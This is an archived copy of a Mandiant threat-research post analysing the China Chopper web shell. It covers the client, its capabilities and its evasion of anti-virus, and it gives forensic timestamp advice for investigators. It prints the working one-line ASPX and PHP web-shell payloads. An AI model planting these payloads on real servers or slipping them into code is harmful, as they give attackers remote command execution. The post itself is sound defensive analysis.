{
	"id": "89591607-5b87-4732-893f-f25613f25192",
	"created_at": "2026-04-06T00:13:49.284634Z",
	"updated_at": "2026-04-10T13:13:03.072332Z",
	"deleted_at": null,
	"sha1_hash": "85381dbf6655d4ef861912149802430b9e74d0ac",
	"title": "Breaking Down the China Chopper Web Shell - Part I | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 541347,
	"plain_text": "Breaking Down the China Chopper Web Shell - Part I | Mandiant\r\nBy Mandiant\r\nPublished: 2013-08-07 · Archived: 2026-04-05 15:16:43 UTC\r\nWritten by: Tony Lee, Ian Ahl, Dennis Hanzlik\r\nPart I in a two-part series.\r\nChina Chopper: The Little Malware That Could\r\nChina Chopper is a slick little web shell that does not get enough exposure and credit for its stealth. Other than a good blog post from security researcher Keith Tyler, we could find little useful information on China Chopper when we ran across it during an incident response engagement. So to contribute something new to the public knowledge base — especially for those who happen to find the China Chopper server-side payload on one of their Web servers — we studied the components, capabilities, payload attributes, and the detection rate of this 4 kilobyte menace.\r\nComponents\r\nChina Chopper is a fairly simple backdoor in terms of components. It has two key components: the Web shell command-and-control (CnC) client binary and a text-based Web shell payload (server component). 
The text-based payload is so simple and short that an attacker could type it by hand right on the target server — no file transfer needed.\r\nWeb Shell Client\r\nThe Web shell client used to be available on www.maicaidao.com, but we would advise against visiting that site now.\r\nWeb shell (CnC) Client | MD5 Hash\r\ncaidao.exe | 5001ef50c7e869253a7c152a638eab8a\r\nThe client binary is packed with UPX and is 220,672 bytes in size, as shown in Figure 1.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 1 of 15\r\nFigure 1: Client binary viewed in WinHex\r\nUsing the executable file compressor UPX to unpack the binary allows us to see some of the details that were hidden by the packer.\r\nC:\\Documents and Settings\\Administrator\\Desktop\u003eupx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exe\r\n                       Ultimate Packer for eXecutables\r\n                          Copyright (C) 1996 - 2011\r\nUPX 3.08w       Markus Oberhumer, Laszlo Molnar \u0026 John Reiser   Dec 12th 2011\r\n\r\n        File size         Ratio\r\n    700416 \u003c-    220672   31.51%    win32/pe     decomp.exe\r\n\r\nUnpacked 1 file.\r\nUsing PEiD (a free tool for detecting packers, cryptors and compilers found in PE executable files), we see that the unpacked client binary was written in Microsoft Visual C++ 6.0, as shown in Figure 2.\r\nFigure 2: PEiD reveals that the binary was written using Visual C++ 6.0\r\nBecause the strings are not encoded, examining the printable strings in the unpacked binary provides insight into how the backdoor communicates. 
We were intrigued to see a reference to google.com.hk using the Chinese (simplified) language parameter (Figure 3) as well as references to the text “Chopper” (Figure 4).\r\nFigure 4: References to Chopper in the client binary\r\nSo we have highlighted some attributes of the client binary. But what does it look like in use? China Chopper is a menu-driven GUI full of convenient attack and victim-management features. Upon opening the client, you see example shell entries that point to www.maicaidao.com, which originally hosted components of the Web shell.\r\nTo add your own target, right-click within the client, select “Add” and enter the target IP address, password, and encoding as shown in Figure 5.\r\nFigure 5: Picture of the China Chopper Web shell client binary\r\nServer-side Payload Component\r\nBut the client is only half of the remote access tool — and not likely the part you would find on your network. Its communication relies on a payload in the form of a small Web application. This payload is available in a variety of languages such as ASP, ASPX, PHP, JSP, and CFM. 
Some of the original files that were available for download are shown with their MD5 hashes:\r\nWeb shell Payload | MD5 Hash\r\nCustomize.aspx | 8aa603ee2454da64f4c70f24cc0b5e08\r\nCustomize.cfm | ad8288227240477a95fb023551773c84\r\nCustomize.jsp | acba8115d027529763ea5c7ed6621499\r\nSource: http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html\r\nEven though the MD5s are useful, keep in mind that this is a text-based payload that can be easily changed, resulting in a new MD5 hash. We will discuss the payload attributes later, but here is an example of just one of the text-based payloads:\r\nASPX:\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Item[\"password\"],\"unsafe\");%\u003e\r\nNote that “password” would be replaced with the actual password to be used in the client component when connecting to the Web shell.\r\nIn the next post, we provide regular expressions that can be used to find instances of this Web shell.\r\nCapabilities\r\nThe capabilities of both the payload and the client are impressive considering their size. 
The Web shell client contains a “Security Scan” feature, independent of the payload, which gives the attacker the ability to spider and use brute-force password guessing against authentication portals.\r\nFigure 6: China Chopper provides a “Security Scan” feature\r\nIn addition to vulnerability hunting, this Web shell has excellent CnC features when combining the client and payload, including the following:\r\nFile Management (File explorer)\r\nDatabase Management (DB client)\r\nVirtual Terminal (Command shell)\r\nIn China Chopper's main window, right-clicking one of the target URLs brings up a list of possible actions (see Figure 7).\r\nFigure 7: Screenshot of the CnC client showing capabilities of the Web shell\r\nFile Management\r\nUsed as a remote access tool (RAT), China Chopper makes file management simple. Abilities include uploading and downloading files to and from the victim, using the file-retrieval tool wget to download files from the Web to the target, editing, deleting, copying, renaming, and even changing the timestamp of the files.\r\nFigure 8: File Management provides an easy-to-use menu that is activated by right-clicking on a file name\r\nSo just how stealthy is the “Modify the file time” option? Figure 9 shows the timestamps of the three files in the test directory before the Web shell modifies the timestamps. By default, Windows Explorer shows only the “Date Modified” field. So normally, our Web shell easily stands out because it is newer than the other two files.\r\nFigure 9: IIS directory showing timestamps prior to the time modification\r\nFigure 10 shows the date of the file after the Web shell modifies the timestamp. 
The modified time on our Web shell shows up as the same as the other two files. Because this is the default field displayed to users, it easily blends in to the untrained eye — especially with many files in the directory.\r\nFigure 10: IIS directory showing timestamps after the time modification\r\nClever investigators may think that they can spot the suspicious file due to the creation date being changed to the same date as the modified date. But this is not necessarily anomalous. Additionally, even if the file is detected, the forensic timeline would be skewed because the date that the attacker planted the file is no longer present. To find the real date the file was planted, you need to go to the Master File Table (MFT). After acquiring the MFT using FTK, EnCase, or other means, we recommend using mftdump (available from http://malware-hunters.net/all-downloads/). Written by FireEye researcher Mike Spohn, mftdump is a great tool for extracting and analyzing file metadata.\r\nThe following table shows the timestamps pulled from the MFT for our Web shell file. We pulled the timestamps before and after the timestamps were modified. 
Notice that the “fn*” fields retain their original times, thus all is not lost for the investigator! (The “si*” rows are the $STANDARD_INFORMATION timestamps, which ordinary file-time APIs can set; the “fn*” rows come from the $FILE_NAME attribute, which those APIs do not update.)\r\nCategory              Pre-touch match     Post-touch match\r\nsiCreateTime (UTC)    6/6/2013 16:01      2/21/2003 22:48\r\nsiAccessTime (UTC)    6/20/2013 1:41      6/25/2013 18:56\r\nsiModTime (UTC)       6/7/2013 0:33       2/21/2003 22:48\r\nsiMFTModTime (UTC)    6/20/2013 1:54      6/25/2013 18:56\r\nfnCreateTime (UTC)    6/6/2013 16:01      6/6/2013 16:01\r\nfnAccessTime (UTC)    6/6/2013 16:03      6/6/2013 16:03\r\nfnModTime (UTC)       6/4/2013 15:42      6/4/2013 15:42\r\nfnMFTModTime (UTC)    6/6/2013 16:04      6/6/2013 16:04\r\nDatabase Management\r\nThe Database Management functionality is impressive and helpful to the first-time user. Upon configuring the client, China Chopper provides example connection syntax.\r\nFigure 11: Database Management requires simple configuration parameters to connect\r\nAfter connecting, China Chopper also provides helpful SQL commands that you may want to run.\r\nFigure 12: Database Management provides the ability to interact with a database and even provides helpful prepopulated commands\r\nCommand Shell Access\r\nFinally, command shell access is provided for that OS-level interaction you crave. 
What a versatile little Web shell!\r\nFigure 13: Virtual Terminal provides a command shell for OS interaction\r\nPayload Attributes\r\nWe stated above that this backdoor is stealthy due to a number of factors including the following:\r\nSize\r\nServer-side content\r\nClient-side content\r\nAV detection rate\r\nSize\r\nLegitimate and illegitimate software usually suffer from the same principle: more features equals more code, which equals larger size. Considering how many features this Web shell contains, it is incredibly small — just 73 bytes for the aspx version, or 4 kilobytes on disk (see Figure 14). Compare that to other Web shells such as Laudanum (619 bytes) or RedTeam Pentesting (8,527 bytes). China Chopper is so small and simple that you could conceivably type the contents of the shell by hand.\r\nFigure 14: China Chopper file properties\r\nServer-Side Content\r\nThe server-side content could easily be overlooked among the other files associated with a vanilla install of a complex application. 
The code does not look too evil in nature, but is curious.\r\nFigure 15: The content of the file seems relatively benign, especially if you add a warm and fuzzy word like Security as the shell password\r\nBelow are the contents of the Web shell for two of its varieties.\r\nASPX:\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Item[\"password\"],\"unsafe\");%\u003e\r\nPHP:\r\n\u003c?php @eval($_POST['password']);?\u003e\r\nClient-Side Content\r\nBecause all of the code is server-side language that does not generate any client-side code, browsing to the Web shell and viewing the source as a client reveals nothing.\r\nFigure 16: Viewing the source of the web shell reveals nothing to the client\r\nAnti-virus Detection Rate\r\nRunning the Web shell through the virus-scanning website No Virus Thanks shows a detection rate of 0 out of 14, indicating that most, if not all, anti-virus tools would miss the Web shell on an infected system.\r\nFigure 17: Results of multiple anti-virus engine inspections showing China Chopper coming up clean\r\nThe same holds true for VirusTotal. None of its 47 anti-virus engines flags China Chopper as malicious.\r\nFigure 18: Results of multiple AV engine inspections showing the Web shell comes up clean\r\nConclusion\r\nWe hope that this post has advanced the understanding of this compact, flexible, and stealthy Web shell. If you are reading this, you may be facing China Chopper right now — if so, we wish you success in eradicating this pest. 
In Part II, we examine the platform China Chopper runs on and describe its delivery mechanisms, traffic analysis and detection.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html"
	],
	"report_names": [
		"breaking-down-the-china-chopper-web-shell-part-i.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434429,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85381dbf6655d4ef861912149802430b9e74d0ac.pdf",
		"text": "https://archive.orkl.eu/85381dbf6655d4ef861912149802430b9e74d0ac.txt",
		"img": "https://archive.orkl.eu/85381dbf6655d4ef861912149802430b9e74d0ac.jpg"
	}
}